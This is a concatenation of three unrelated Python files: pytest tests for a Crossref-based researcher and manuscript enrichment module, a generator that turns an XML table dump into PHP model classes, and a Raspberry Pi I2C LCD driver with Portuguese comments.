DEFAULT_MAX_WORKERS
)
LOGGER = logging.getLogger(__name__)
URL_1 = 'test://dummy.url'
URL_2 = 'test://dummy.url2'
UNICODE_URL_1 = 'test://dummy.url?\xe4'
TITLE1 = 'Title 1'
ABSTRACT1 = 'Abstract 1'
MANUSCRIPT_TYPE1 = 'Manuscript Type 1'
# Schema field names
PERSON_ID = 'person_id'
MANUSCRIPT_ID = 'manuscript_id'
DOI = 'doi'
PERSON_ID_1 = 'person1'
PERSON_ID_2 = 'person2'
FIRST_NAME_1 = 'Jon'
LAST_NAME_1 = 'Smith'
PERSON_1 = {
PERSON_ID: PERSON_ID_1,
'first_name': FIRST_NAME_1,
'last_name': LAST_NAME_1,
'is_early_career_researcher': False
}
ECR_1 = {
**PERSON_1,
'is_early_career_researcher': True
}
ORCID_1 = 'orcid1'
ORCID_MEMBERSHIP_1 = {
PERSON_ID: PERSON_ID_1,
'member_type': 'ORCID',
'member_id': ORCID_1
}
DOI_1 = 'doi1'
DOI_2 = 'doi2'
MANUSCRIPT_ID_1 = 'manuscript1'
ROLE_1 = 'role1'
ROLE_2 = 'role2'
EMPTY_DATASET = {}
def setup_module():
logging.root.handlers = []
logging.basicConfig(level=logging.DEBUG)
def get_crossref_response(items):
return json.dumps({
'message': {
'items': items
}
})
@pytest.fixture(name='mock_f')
def _mock_f():
mock_f = Mock()
mock_f.return_value = 'mock_f return_value'
return mock_f
class TestCreateStrCache:
@pytest.fixture
def now(self):
with patch.object(enrich_data_module, 'get_current_time') as now:
yield now
@pytest.fixture
def getmtime(self):
with patch('os.path.getmtime') as getmtime:
yield getmtime
def test_should_call_function_and_return_value_if_not_in_cache(self, tmpdir, mock_f: Mock):
cached_f = create_str_cache(mock_f, str(tmpdir))
assert cached_f(URL_1) == mock_f.return_value
mock_f.assert_called_with(URL_1)
def test_should_call_function_with_unicode(self, tmpdir, mock_f: Mock):
cached_f = create_str_cache(mock_f, str(tmpdir))
assert cached_f(UNICODE_URL_1) == mock_f.return_value
mock_f.assert_called_with(UNICODE_URL_1)
def test_should_call_function_only_once_called_with_the_same_parameter(
self, tmpdir, mock_f: Mock):
cached_f = create_str_cache(mock_f, str(tmpdir))
cached_f(URL_1)
assert cached_f(URL_1) == mock_f.return_value
assert mock_f.call_count == 1
def test_should_call_function_multiple_times_if_called_with_the_different_parameter(
self, tmpdir, mock_f: Mock):
cached_f = create_str_cache(mock_f, str(tmpdir))
cached_f(URL_1)
assert cached_f(URL_2) == mock_f.return_value
assert mock_f.call_count == 2
mock_f.assert_called_with(URL_2)
def test_should_call_function_twice_if_cache_has_expired(
self, tmpdir, mock_f: Mock, now: Mock, getmtime: Mock):
now.return_value = datetime(2018, 1, 1)
getmtime.return_value = now.return_value.timestamp()
LOGGER.info('str(tmpdir): %s', str(tmpdir))
cached_f = create_str_cache(mock_f, str(tmpdir), expire_after_secs=10)
cached_f(URL_1)
now.return_value = now.return_value + timedelta(seconds=10)
assert cached_f(URL_1) == mock_f.return_value
assert mock_f.call_count == 2
def test_should_call_function_once_if_cache_has_not_yet_expired(
self, tmpdir, mock_f: Mock, now: Mock, getmtime: Mock):
now.return_value = datetime(2018, 1, 1)
getmtime.return_value = now.return_value.timestamp()
cached_f = create_str_cache(mock_f, str(tmpdir), expire_after_secs=10)
cached_f(URL_1)
now.return_value = now.return_value + timedelta(seconds=9)
assert cached_f(URL_1) == mock_f.return_value
assert mock_f.call_count == 1
class TestExtractManuscript:
def test_should_extract_title_if_present(self):
result = extract_manuscript({
'title': [TITLE1]
})
assert result.get('title') == TITLE1
def test_should_extract_abstract_if_present(self):
result = extract_manuscript({
'abstract': ABSTRACT1
})
assert result.get('abstract') == ABSTRACT1
def test_should_return_none_abstract_if_not_present(self):
result = extract_manuscript({})
assert result.get('abstract') is None
def test_should_extract_type_if_present(self):
result = extract_manuscript({
'type': MANUSCRIPT_TYPE1
})
assert result.get('manuscript_type') == MANUSCRIPT_TYPE1
def MapRequestHandler(response_by_url_map: Dict[str, str]):
def get_request_handler(url):
response_text = response_by_url_map.get(url)
if not response_text:
raise RuntimeError('url not configured: {}'.format(url))
return response_text
return get_request_handler
class TestContainsAuthorWithOrcid:
def test_should_false_if_item_has_no_authors(self):
assert not contains_author_with_orcid({}, ORCID_1)
def test_should_false_if_author_does_not_have_orcid(self):
assert not contains_author_with_orcid({
'author': {}
}, ORCID_1)
def test_should_false_if_orcid_does_not_match(self):
assert not contains_author_with_orcid({
'author': [{'ORCID': 'other'}]
}, ORCID_1)
def test_should_true_if_orcid_matches(self):
assert contains_author_with_orcid({
'author': [{'ORCID': ORCID_1}]
}, ORCID_1)
class TestGetPersonsToEnrich:
def test_should_raise_error_if_no_filter_option_specified(self):
with populated_in_memory_database(EMPTY_DATASET) as db:
with pytest.raises(AssertionError):
get_persons_to_enrich(db)
def test_should_include_ecr_without_orcid_membership(self):
dataset = {
'person': [ECR_1]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_early_career_researchers=True)
assert {p[PERSON_ID] for p in person_list} == {ECR_1[PERSON_ID]}
assert {p.get('ORCID') for p in person_list} == {None}
def test_should_include_ecr_with_orcid_membership(self):
dataset = {
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_early_career_researchers=True)
assert {p[PERSON_ID] for p in person_list} == {ECR_1[PERSON_ID]}
LOGGER.debug('person_list: %s', person_list)
assert {p.get('ORCID') for p in person_list} == {ORCID_1}
def test_should_include_person_by_role_without_orcid_membership(self):
dataset = {
'person': [PERSON_1],
'person_role': [{PERSON_ID: PERSON_ID_1, 'role': ROLE_1}]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1])
assert {p[PERSON_ID] for p in person_list} == {PERSON_ID_1}
LOGGER.debug('person_list: %s', person_list)
assert {p.get('ORCID') for p in person_list} == {None}
def test_should_include_person_by_role_with_orcid_membership(self):
dataset = {
'person': [PERSON_1],
'person_role': [{PERSON_ID: PERSON_ID_1, 'role': ROLE_1}],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1])
assert {p[PERSON_ID] for p in person_list} == {PERSON_ID_1}
LOGGER.debug('person_list: %s', person_list)
assert {p.get('ORCID') for p in person_list} == {ORCID_1}
def test_should_not_include_person_with_different_role(self):
dataset = {
'person': [PERSON_1],
'person_role': [{PERSON_ID: PERSON_ID_1, 'role': ROLE_2}]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1])
assert {p[PERSON_ID] for p in person_list} == set()
def test_should_not_include_person_without_a_role(self):
dataset = {
'person': [PERSON_1]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1])
assert {p[PERSON_ID] for p in person_list} == set()
def test_should_include_person_by_role_once_with_multiple_matching_roles(self):
dataset = {
'person': [PERSON_1],
'person_role': [
{PERSON_ID: PERSON_ID_1, 'role': ROLE_1},
{PERSON_ID: PERSON_ID_1, 'role': ROLE_2}
]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1, ROLE_2])
assert [p[PERSON_ID] for p in person_list] == [PERSON_ID_1]
def test_should_include_person_by_ecr_and_role(self):
dataset = {
'person': [
{**PERSON_1, PERSON_ID: PERSON_ID_1},
{**ECR_1, PERSON_ID: PERSON_ID_2}
],
'person_role': [{PERSON_ID: PERSON_ID_1, 'role': ROLE_1}]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(
db, include_early_career_researchers=True, include_roles=[ROLE_1]
)
assert {p[PERSON_ID] for p in person_list} == {PERSON_ID_1, PERSON_ID_2}
def _enrich_early_career_researchers(db, get_request_handler, max_workers=1):
person_list = get_persons_to_enrich(
db, include_early_career_researchers=True, include_roles=[]
)
enrich_and_update_person_list(
db, person_list, get_request_handler, max_workers=max_workers
)
class TestEnrichAndUpdatePersonList:
def test_should_not_fail_if_database_is_empty(self):
with populated_in_memory_database(EMPTY_DATASET) as db:
_enrich_early_career_researchers(db, MapRequestHandler({}))
def test_should_import_one_by_orcid(self):
response_by_url_map = {
get_crossref_works_by_orcid_url(ORCID_1): get_crossref_response([{
'DOI': DOI_1,
'author': [{
'ORCID': ORCID_1
}]
}])
}
dataset = {
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
manuscript_df = db.manuscript.read_frame().reset_index()
LOGGER.debug('manuscript_df:\n%s', manuscript_df)
assert set(manuscript_df[DOI]) == {DOI_1}
manuscript_version_df = db.manuscript_version.read_frame().reset_index()
LOGGER.debug('manuscript_version_df:\n%s', manuscript_version_df)
assert set(manuscript_version_df['is_published']) == {True}
def test_should_import_one_by_full_name(self):
full_name = ' '.join([FIRST_NAME_1, LAST_NAME_1])
response_by_url_map = {
get_crossref_works_by_full_name_url(full_name): get_crossref_response([{
'DOI': DOI_1,
'author': [{
'given': FIRST_NAME_1,
'family': LAST_NAME_1
}]
}])
}
# not adding ORCID membership, this will trigger search by name instead
dataset = {
'person': [ECR_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
manuscript_df = db.manuscript.read_frame().reset_index()
LOGGER.debug('manuscript_df:\n%s', manuscript_df)
assert set(manuscript_df[DOI]) == {DOI_1}
manuscript_version_df = db.manuscript_version.read_frame().reset_index()
LOGGER.debug('manuscript_version_df:\n%s', manuscript_version_df)
assert set(manuscript_version_df['is_published']) == {True}
def test_should_import_one_if_existing_doi_is_different(self):
response_by_url_map = {
get_crossref_works_by_orcid_url(ORCID_1): get_crossref_response([{
'DOI': DOI_2,
'author': [{
'ORCID': ORCID_1
}]
}])
}
dataset = {
'manuscript': [{
MANUSCRIPT_ID: MANUSCRIPT_ID_1,
DOI: DOI_1
}],
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
df = db.manuscript.read_frame().reset_index()
LOGGER.debug('df:\n%s', df)
assert set(df[DOI]) == {DOI_1, DOI_2}
def test_should_not_import_one_if_doi_already_exists(self):
response_by_url_map = {
get_crossref_works_by_orcid_url(ORCID_1): get_crossref_response([{
'DOI': DOI_1,
'author': [{
'ORCID': ORCID_1
}]
}])
}
dataset = {
'manuscript': [{
MANUSCRIPT_ID: MANUSCRIPT_ID_1,
DOI: DOI_1
}],
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
df = db.manuscript.read_frame().reset_index()
LOGGER.debug('df:\n%s', df)
assert list(df[DOI]) == [DOI_1]
def test_should_not_import_one_if_doi_already_exists_with_different_case(self):
doi_1_original = 'Doi 1'
doi_1_new = 'doi 1'
response_by_url_map = {
get_crossref_works_by_orcid_url(ORCID_1): get_crossref_response([{
'DOI': doi_1_new,
'author': [{
'ORCID': ORCID_1
}]
}])
}
dataset = {
'manuscript': [{
MANUSCRIPT_ID: MANUSCRIPT_ID_1,
DOI: doi_1_original
}],
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
df = db.manuscript.read_frame().reset_index()
LOGGER.debug('df:\n%s', df)
assert list(df[DOI]) == [doi_1_original]
class TestParseIntList:
def test_should_return_default_value_for_none(self):
assert parse_int_list(None, [1, 2, 3]) == [1, 2, 3]
def test_should_return_default_value_for_empty_string(self):
assert parse_int_list('', [1, 2, 3]) == [1, 2, 3]
def test_should_parse_multiple_values(self):
assert parse_int_list('100, 200, 300', [1, 2, 3]) == [100, 200, 300]
class TestDecorateGetRequestHandler:
@pytest.fixture(autouse=True)
def create_str_cache_mock(self):
with patch.object(enrich_data_module, 'create_str_cache') as create_str_cache_mock:
yield create_str_cache_mock
def test_should_call_through_with_decorators(self, mock_f):
app_config = ConfigParser()
decorated_get_request_handler = decorate_get_request_handler(
mock_f, app_config, cache_dir=None
)
assert decorated_get_request_handler(URL_1) == mock_f.return_value
assert decorate_get_request_handler != mock_f # pylint: disable=comparison-with-callable
def test_should_pass_expire_after_secs_to_cache(self, create_str_cache_mock, mock_f):
cache_dir = '.cache/dir'
decorate_get_request_handler(mock_f, dict_to_config(
{}), cache_dir=cache_dir, expire_after_secs=123)
create_str_cache_mock.assert_called_with(
ANY,
cache_dir=cache_dir,
suffix='.json',
expire_after_secs=123
)
class TestMain:
@pytest.fixture(name='get_app_config_mock', autouse=True)
def _get_app_config(self):
with patch.object(enrich_data_module, 'get_app_config') as get_app_config_mock:
get_app_config_mock.return_value = dict_to_config({})
yield get_app_config_mock
@pytest.fixture(name='decorate_get_request_handler_mock', autouse=True)
def _decorate_get_request_handler(self):
with patch.object(enrich_data_module, 'decorate_get_request_handler') \
as decorate_get_request_handler_mock:
yield decorate_get_request_handler_mock
@pytest.fixture(name='connect_managed_configured_database_mock', autouse=True)
def _connect_managed_configured_database(self):
with patch.object(enrich_data_module, 'connect_managed_configured_database') \
as connect_managed_configured_database_mock:
yield connect_managed_configured_database_mock
@pytest.fixture(name='get_persons_to_enrich_mock', autouse=True)
def _get_persons_to_enrich(self):
with patch.object(enrich_data_module, 'get_persons_to_enrich') \
as get_persons_to_enrich_mock:
yield get_persons_to_enrich_mock
@pytest.fixture(name='enrich_and_update_person_list_mock', autouse=True)
def _enrich_and_update_person_list(self):
with patch.object(enrich_data_module, 'enrich_and_update_person_list') \
as enrich_and_update_person_list_mock:
yield enrich_and_update_person_list_mock
def test_should_parse_expire_after_secs_and_pass_to_decorate_get_request_handler(
self, get_app_config_mock, decorate_get_request_handler_mock):
get_app_config_mock.return_value = dict_to_config({
'crossref': {
'expire_after_secs': '123'
}
})
main()
decorate_get_request_handler_mock.assert_called_with(
ANY,
ANY,
cache_dir=ANY,
expire_after_secs=123
)
def test_should_parse_false_early_career_researcher_and_pass_to_get_persons_to_enrich(
self, get_app_config_mock, get_persons_to_enrich_mock):
get_app_config_mock.return_value = dict_to_config({
'enrich-data': {
'include_early_career_researcher': 'false'
}
})
main()
get_persons_to_enrich_mock.assert_called_with(
ANY,
include_early_career_researchers=False,
include_roles=ANY
)
def test_should_parse_true_early_career_researcher_and_pass_to_get_persons_to_enrich(
self, get_app_config_mock, get_persons_to_enrich_mock):
get_app_config_mock.return_value = dict_to_config({
'enrich-data': {
'include_early_career_researcher': 'true'
}
})
main()
get_persons_to_enrich_mock.assert_called_with(
ANY,
include_early_career_researchers=True,
include_roles=ANY
)
def test_should_parse_roles_and_pass_to_get_persons_to_enrich(
self, get_app_config_mock, get_persons_to_enrich_mock):
get_app_config_mock.return_value = dict_to_config({
'enrich-data': {
'include_roles': '%s, %s' % (ROLE_1, ROLE_2)
}
})
main()
get_persons_to_enrich_mock.assert_called_with(
ANY,
include_early_career_researchers=ANY,
include_roles=[ROLE_1, ROLE_2]
)
def test_should_pass_correct_parameters_to_enrich_and_update_person_list(
self,
connect_managed_configured_database_mock,
get_persons_to_enrich_mock,
enrich_and_update_person_list_mock,
decorate_get_request_handler_mock):
main()
enrich_and_update_person_list_mock.assert_called_with(
connect_managed_configured_database_mock.return_value.__enter__.return_value,
get_persons_to_enrich_mock.return_value,
get_request_handler=decorate_get_request_handler_mock.return_value,
max_workers=DEFAULT_MAX_WORKERS
)
|
import sys
import xml.etree.ElementTree as ET
def generate_converter_method(table):
buff = []
table_name = table.attrib["name"]
buff.append(
" public function to"
+ to_pascal_case(table_name)
+ "(ORM $item) : "
+ to_pascal_case(table_name)
+ " {"
)
buff.append(
" $"
+ to_camel_case(table_name)
+ " = new "
+ to_pascal_case(table_name)
+ "();"
)
for field in table.findall("./field"):
field_name = field.attrib["Field"]
buff.append(
" $"
+ to_camel_case(table_name)
+ "->"
+ to_camel_case(field_name)
+ " = $item->"
+ field_name
+ ";"
)
buff.append(" return $" + to_camel_case(table_name) + ";")
buff.append(" }")
return buff
def generate_tostring_method(table):
buff = []
buff.append(" public function __toString() {")
buff.append(" $result = [];")
for field in table.findall("./field"):
field_name = field.attrib["Field"]
buff.append(
" $result[] = '"
+ to_camel_case(field_name)
+ ":[' . $this->"
+ to_camel_case(field_name)
+ " . ']"
+ "';"
)
buff.append(" return implode(',', $result);")
buff.append(" }")
return buff
def generate_model_class(filename):
buff = []
tree = ET.parse(filename)
root = tree.getroot()
for table in root.findall("./database/table_structure"):
table_name = table.attrib["name"]
buff.append("class " + to_pascal_case(table_name) + " {")
# generate properties.
for field in table.findall("./field"):
field_comment = field.attrib["Comment"]
field_name = field.attrib["Field"]
buff.append(" // " + field_comment)
buff.append(" public $" + to_camel_case(field_name) + ";")
buff.append("")
# generate converter.
method = generate_converter_method(table)
buff.append("\n".join(method))
buff.append("")
tostring = generate_tostring_method(table)
buff.append("\n".join(tostring))
buff.append("}")
return buff
def to_pascal_case(snake_str):
components = snake_str.split("_")
return "".join(x.title() for x in components)
def to_camel_case(snake_str):
components = snake_str.split("_")
return components[0] + "".join(x.title() for x in components[1:])
if __name__ == "__main__":
args = sys.argv
if 2 == len(args):
filename = args[1]
buff = generate_model_class(filename)
print("\n".join(buff))
else:
print("Usage: python gen_model.py [filename.xml]")
|
import smbus
from time import sleep
# Classe para simplificar o acesso ao I2C (so escrita)
class i2c_device:
# construtor
def __init__(self, addr):
# salva o endereco
self.addr = addr
# seleciona o i2c conforme a versao do Raspberry Pi
self.revision = ([l[12:-1] for l in open('/proc/cpuinfo','r').readlines() if l[:8]=="Revision"]+['0000'])[0]
self.bus = smbus.SMBus(1)
# escreve um byte
def write(self, byte):
self.bus.write_byte(self.addr, byte)
# Classe para acesso ao LCD
class lcd_pcf8574:
#construtor
def __init__(self, addr=0x27, bitRS=0, bitRW=1, bitE=2, bitBL=3, bitD4=4, bitD5=5, bitD6=6, bitD7=7):
# salva a configuracao
self.mskRS = 1 << bitRS
self.mskRW = 1 << bitRW
self.mskE = 1 << bitE
self.mskBL = 1 << bitBL
self.mskD4 = 1 << bitD4
self.mskD5 = 1 << bitD5
self.mskD6 = 1 << bitD6
self.mskD7 = 1 << bitD7
# inicia o acesso ao PCF8574
self.lcd_device = i2c_device(0x27)
self.valorAtual = 0x00
self.lcd_device.write(self.valorAtual);
# constantes
self.LOW = 0
self.HIGH = 1
self.CMD = self.LOW
self.DADO = self.HIGH
self.CMD_CLS = 0x01
self.CMD_DISPON = 0x0C
self.CMD_POSCUR = 0x80
self.CMD_FUNCTIONSET = 0x20
self.LCD_4BITMODE = 0x00
self.LCD_2LINE = 0x08
self.LCD_5x8DOTS = 0x00
# controla sinal RS
def setRS(self, valor):
if valor == self.LOW:
self.valorAtual = self.valorAtual & ~self.mskRS
else:
self.valorAtual = self.valorAtual | self.mskRS
self.lcd_device.write(self.valorAtual)
# controla sinal RW
def setRW(self, valor):
if valor == self.LOW:
self.valorAtual = self.valorAtual & ~self.mskRW
else:
self.valorAtual = self.valorAtual | self.mskRW
self.lcd_device.write(self.valorAtual)
# controla sinal E (enable)
def setE(self, valor):
if valor == self.LOW:
self.valorAtual = self.valorAtual & ~self.mskE
else:
self.valorAtual = self.valorAtual | self.mskE
self.lcd_device.write(self.valorAtual)
# controla backlight
def setBL(self, valor):
if valor == self.LOW:
self.valorAtual = self.valorAtual & ~self.mskBL
else:
self.valorAtual = self.valorAtual | self.mskBL
self.lcd_device.write(self.valorAtual)
# controla os pinos de dados (D4 a D7)
def setDado(self, nib):
self.valorAtual = self.valorAtual & ~(self.mskD4 | self.mskD5 | self.mskD6 | self.mskD7)
if (nib & 8) != 0:
self.valorAtual = self.valorAtual | self.mskD7
if (nib & 4) != 0:
self.valorAtual = self.valorAtual | self.mskD6
if (nib & 2) != 0:
self.valorAtual = self.valorAtual | self.mskD5
if (nib & 1) != 0:
self.valorAtual = self.valorAtual | self.mskD4
self.lcd_device.write(self.valorAtual)
# envia um byte para o display
def writeByte(self, rs, dado):
self.setRS(rs)
self.setE(self.HIGH)
self.setDado (dado >> 4)
self.setE(self.LOW)
self.setE(self.HIGH)
self.setDado (dado)
self.setE(self.LOW)
# envia um comando para o display
def writeCmd(self, cmd):
self.writeByte(self.CMD, cmd)
# envia um caracter para o display
def writeChar(self, chr):
self.writeByte(self.DADO, chr)
# inicia o display
def init(self):
# para o caso de ter acabado de ligar
sleep(0.1)
# vamos sempre fazer escrita
self.setRW(self.LOW)
# sequencia para garantir modo 4 bits
self.writeCmd(0x03)
sleep(0.005)
self.writeCmd(0x03)
sleep(0.001)
self.writeCmd(0x03)
sleep(0.001)
self.writeCmd(0x02)
sleep(0.001)
# configura o display
self.writeCmd(self.CMD_FUNCTIONSET | self.LCD_4BITMODE | self.LCD_2LINE | self.LCD_5x8DOTS);
sleep(0.001)
# limpa a tela e liga o display
self.writeCmd(self.CMD_CLS)
sleep(0.002)
self.writeCmd(self.CMD_DISPON)
# liga o backlight
def backlightOn(self):
self.setBL(self.HIGH)
# desliga o backlight
def backlightOff(self):
self.setBL(self.LOW)
# limpa a tela
def clear(self):
self.writeCmd(self.CMD_CLS)
sleep(0.002)
# escreve um texto no display
def displayWrite(self, lin, col, texto):
self.ender = col
if lin == 1:
self.ender = self.ender + 0x40
self.writeCmd (self.CMD_POSCUR + self.ender)
for chr in texto:
self.writeChar(ord(chr))
# Teste simples
if __name__ == "__main__":
lcd = lcd_pcf8574()
lcd.init()
lcd.backlightOn()
lcd.displayWrite(0, 0, "DQSoft")
lcd.displayWrite(1, 0, "Display I2C")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.